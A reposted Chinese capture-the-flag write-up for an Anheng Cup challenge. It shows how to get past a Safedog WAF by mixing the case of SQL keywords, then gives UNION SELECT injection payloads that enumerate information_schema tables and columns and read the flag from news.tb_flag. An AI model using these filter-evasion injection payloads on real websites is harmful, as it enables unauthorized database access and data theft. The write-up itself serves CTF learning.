安恒杯-绕过看门狗

Posted hell0_w

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安恒杯-绕过看门狗相关的知识,希望对你有一定的参考价值。

1. 输入and 1=1发现非法提示

 

 

通过大小写混淆可以绕过

 

 

2. 经测试,发现有5个字段

 

 

3. 查数据库和当前用户

 

 

4. 查表

UniOn SelEct 1,(SelEct Table_Name fROm InfOrMation_sChema.tAbles WhEre tAble_sChema=\'news\' lImit 1,1),3,4,5#

 

 

 

5. 查表中字段

UniOn Select 1,(SelecT ColuMn_Name FrOm InFOrMation_sChema.COluMns WherE TaBle_NaMe=\'tb_flag\' liMit 0,1),3,4,5#

 

 

5. 查内容

UniOn Select 1,(SelecT flag FrOm news.tb_flag),3,4,5#

 

 

本文固定链接:http://www.cnblogs.com/hell0w/p/8119659.html

 

以上是关于安恒杯-绕过看门狗的主要内容,如果未能解决你的问题,请参考以下文章

安恒杯2月月赛-应该不是xss

安恒杯月赛babybypass 不用英文数字getshell

4.29安恒杯writeup

安恒杯月赛 babypass getshell不用英文字母和数字

安恒杯-一张谍报

安恒杯-被劫持的神秘礼物